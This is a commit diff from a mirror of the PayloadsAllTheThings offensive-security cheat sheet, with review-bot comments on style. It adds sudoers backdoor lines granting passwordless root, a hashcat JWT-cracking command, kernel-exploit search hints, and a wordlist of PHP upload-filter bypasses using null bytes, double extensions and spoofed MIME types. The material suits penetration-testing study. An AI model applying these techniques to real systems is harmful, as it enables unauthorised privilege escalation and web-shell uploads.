mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-01-18 01:15:25 +00:00
PrivEsc - sudoers + Upload PHP
parent 3ca07aeb7a
commit 2b1900e046
@ -243,4 +243,5 @@ curl -X POST http://localhost:8080/graphql\?embedded_submission_form_uuid\=1%27%
* [How to set up a GraphQL Server using Node.js, Express & MongoDB - 5 NOVEMBER 2018 - Leonardo Maldonado](https://www.freecodecamp.org/news/how-to-set-up-a-graphql-server-using-node-js-express-mongodb-52421b73f474/)
* [GraphQL cheatsheet - DEVHINTS.IO](https://devhints.io/graphql)
* [HIP19 Writeup - Meet Your Doctor 1,2,3 - June 22, 2019 - Swissky](https://swisskyrepo.github.io/HIP19-MeetYourDoctor/)
* [Introspection query leaks sensitive graphql system information - @Zuriel](https://hackerone.com/reports/291531)
* [Introspection query leaks sensitive graphql system information - @Zuriel](https://hackerone.com/reports/291531)
* [Graphql Bug to Steal Anyone’s Address - Sept 1, 2019 - Pratik Yadav](https://medium.com/@pratiky054/graphql-bug-to-steal-anyones-address-fc34f0374417)
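Review bot: the `Introspection query leaks sensitive graphql system information` entry appears once as removed and once as re-added with identical text, so the only change to that line is whitespace (presumably a trailing newline), and the substantive change in this hunk is the appended Pratik Yadav reference; fine to merge, but whitespace-only touches are best kept out of content commits so the file history stays readable.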
@ -250,7 +250,7 @@ Secret is "Sn1f"
### Hashcat
> Support added to crack JWT (JSON Web Token) with hashcat at 365MH/s on a single GTX1080 - [src](twitter.com/hashcat/status/955154646494040065)
> Support added to crack JWT (JSON Web Token) with hashcat at 365MH/s on a single GTX1080 - [src](https://twitter.com/hashcat/status/955154646494040065)
```bash
/hashcat -m 16500 hash.txt -a 3 -w 3 ?a?a?a?a?a?a
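Review bot: adding the `https://` scheme is the right fix, since a bare `twitter.com/...` target renders as a relative link. While in this block, the context line `/hashcat -m 16500 hash.txt -a 3 -w 3 ?a?a?a?a?a?a` has a stray leading slash and should read `hashcat ...` or `./hashcat ...`; it would also help to state beside it that `-m 16500` is hashcat's JWT mode and that the mask `?a?a?a?a?a?a` only tries six-character secrets, so longer HMAC keys need a longer mask or a wordlist attack (`-a 0`).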
@ -84,7 +84,7 @@
* Checks if password hashes are stored in /etc/passwd
* Extract full details for 'default' uid's such as 0, 1000, 1001 etc
* Attempt to read restricted files i.e. /etc/shadow
* List current users history files (i.e .bash_history, .nano_history etc.)
* List current users history files (i.e .bash_history, .nano_history, .mysql_history , etc.)
* Basic SSH checks
* Privileged access:
* Which users have recently used sudo
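Review bot: stray space before the comma in the new line `.mysql_history , etc.`; it should read `(i.e. .bash_history, .nano_history, .mysql_history, etc.)` to match the punctuation of the surrounding bullets.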
@ -455,9 +455,9 @@ echo "username ALL=(ALL:ALL) ALL">>/etc/sudoers
# use SUDO without password
echo "username ALL=(ALL) NOPASSWD: ALL" >>/etc/sudoers
echo "username ALL=NOPASSWD: /bin/bash" >>/etc/sudoers
```
## NFS Root Squashing
When **no_root_squash** appears in `/etc/exports`, the folder is shareable and a remote user can mount it
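Review bot: this hunk replaces the blanket grant `echo "username ALL=(ALL) NOPASSWD: ALL" >>/etc/sudoers` with `echo "username ALL=NOPASSWD: /bin/bash" >>/etc/sudoers`, dropping the `(ALL)` runas list; that is still valid sudoers syntax (the runas defaults to root), but the old line is the more general example under the `# use SUDO without password` comment, so keep both rather than swapping one for the other. Since the block appends to `/etc/sudoers` directly with `>>`, a one-line warning that a malformed entry can break sudo for every user, and that `visudo -c` validates the file afterwards, would spare readers who try this outside a lab.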
@ -620,7 +620,7 @@ Precompiled exploits can be found inside these repositories, run them at your ow
* [bin-sploits - @offensive-security](https://github.com/offensive-security/exploitdb-bin-sploits/tree/master/bin-sploits)
* [kernel-exploits - @lucyoa](https://github.com/lucyoa/kernel-exploits/)
The following exploits are known to work well.
The following exploits are known to work well, search for another exploits using `searchsploit -w linux kernel centos`.
### CVE-2016-5195 (DirtyCow)
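Review bot: grammar in the new sentence: `search for another exploits` should be `search for other exploits`, and the comma splice reads better as two sentences: `The following exploits are known to work well. Search for other exploits using \`searchsploit -w linux kernel centos\`.` It is also worth noting next to the command that `-w` makes searchsploit print Exploit-DB URLs rather than local file paths, since a reader who wants the exploit source on disk will expect paths.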
20
Upload Insecure Files/Extension PHP/extensions.lst
Normal file
@ -0,0 +1,20 @@
.jpeg.php
.jpg.php
.png.php
.php
.php3
.php4
.php5
.php7
.pht
.phar
.phpt
.pgif
.phtml
.phtm
.php%00.gif
.php\x00.gif
.php%00.png
.php\x00.png
.php%00.jpg
.php\x00.jpg
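Review bot: the null-byte entries in this new wordlist are written in two encodings, URL-encoded (`.php%00.gif`) and C-style escaped (`.php\x00.gif`); a wordlist consumer such as Burp Intruder or a fuzzer sends `\x00` as the four literal characters `\`, `x`, `0`, `0` unless it is told to decode escapes, so a comment at the top of the file stating which form the tooling is expected to decode, or keeping only the raw form the tool accepts, would avoid silent false negatives. The first three entries (`.jpeg.php`, `.jpg.php`, `.png.php`) are double-extension tricks that rely on the server mapping the last extension to PHP, which is a different bypass from the null-byte truncation entries and deserves its own group or comment so readers do not lump them together.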
@ -54,8 +54,17 @@ Coldfusion: .cfm, .cfml, .cfc, .dbm
### Upload tricks
- Null byte (eg: shell.php%00.gif, shell.php%00.png), works well against `pathinfo()`
- Null byte (works well against `pathinfo()`)
* .php%00.gif
* .php\x00.gif
* .php%00.png
* .php\x00.png
* .php%00.jpg
* .php\x00.jpg
- Mime type, change `Content-Type : application/x-php` or `Content-Type : application/octet-stream` to `Content-Type : image/gif`
* `Content-Type : image/gif`
* `Content-Type : image/png`
* `Content-Type : image/jpeg`
### Picture upload with LFI
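Review bot: the unchanged parent bullet still ends with `to \`Content-Type : image/gif\`` while the three new sub-bullets list `image/gif`, `image/png` and `image/jpeg`, so the parent sentence should stop at `to one of:` to avoid stating one value and then listing three. The header is also spelled `Content-Type : image/gif` throughout with a space before the colon; the actual HTTP header is `Content-Type: image/gif`, and a reader pasting these into a raw request will send a malformed header name. The new `*` sub-bullets under `-` parents are fine in markdown, but make sure they are indented in the source so they render nested rather than as a second top-level list.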